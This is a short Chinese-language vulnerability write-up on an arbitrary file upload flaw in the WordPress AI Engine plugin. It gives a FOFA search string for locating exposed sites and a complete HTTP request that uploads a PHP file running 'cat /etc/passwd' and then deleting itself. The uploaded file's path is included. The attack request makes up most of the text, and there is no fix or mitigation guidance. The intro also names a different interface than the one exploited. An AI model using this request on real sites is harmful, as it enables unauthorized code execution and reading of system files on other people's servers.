Wordpress AI Engine插件存在任意文件上传漏洞
一、漏洞简介
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。Wordpress saveconfiguration接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
二、影响版本
- Wordpress AI Engine插件
三、资产测绘
- fofa
"wp-content/plugins/ai-engine/"
- 特征
四、漏洞复现
POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Type: multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy
Connection: close
Content-Length: 244
--------------------------7bghbgerugy87gerbuy
Content-Disposition: form-data; name="file"; filename="ceshi.php"
Content-Type: text/plain
<?php system("cat /etc/passwd");unlink(__FILE__);?>
--------------------------7bghbgerugy87gerbuy--
文件位置
/wp-content/uploads/2024/05/ceshi.php